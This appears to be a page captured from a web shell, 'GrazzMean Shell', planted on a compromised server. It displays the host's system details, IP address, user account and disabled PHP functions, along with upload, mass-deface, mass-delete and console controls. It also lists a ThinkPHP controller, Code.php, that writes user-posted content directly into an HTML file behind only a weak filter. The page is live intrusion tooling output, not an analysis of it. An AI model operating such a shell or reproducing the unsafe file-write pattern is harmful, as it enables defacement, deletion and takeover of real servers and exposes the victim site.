shell bypass 403

GrazzMean Shell

: /www/wwwroot/jc.chatgptzh.com/app/index/controller/ [ drwxr-xr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
upload mass deface mass delete console

name : Code.php 
<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2020-08-10 http://myucms.com All rights reserved.
// +----------------------------------------------------------------------
// | Author: 梦雨 <50361804@qq.com>
// +----------------------------------------------------------------------
namespace app\index\controller;
use think\Controller;
use think\Db;
open_ts(); 
class Code extends Controller
{
    //html代码运行
    public function code()
    {
        $c = Db::name('code')->find(get('id'));
        if (get('id')) {
            $this->assign('c',$c);
        }
       return view(PATH.'/index/'.set('tpl').'/code/code.html');
    }
    //html代码运行a页面
    public function code_a()
    {
        $c = Db::name('code')->find(get('id'),0);
        if ($c['id']) {
            $this->assign('c', $c);
        } else {
            $code = set('title');
            $this->assign('content', $code);
        }
        return view(PATH.'/index/'.set('tpl').'/code/code_a.html');
    }
    //html代码运行b页面
    public function code_b()
    {
        $c = Db::name('code')->find(get('id'));
        if ($c['id']) {
            $this->assign('c', $c);
            $code = stripslashes(seo($c['content']));
        } else {
            $code = set('title');
        }
        if (_post()) {
            //去掉php运行代码
            $code = stripslashes(preg_replace("/<\?php(.*?)?>/is", "", $_POST['content']));
        }
        file_put_contents(md5('run') . '.html', $code);
        header("Location:./" . md5('run') . ".html");
    }
}
© 2026 GrazzMean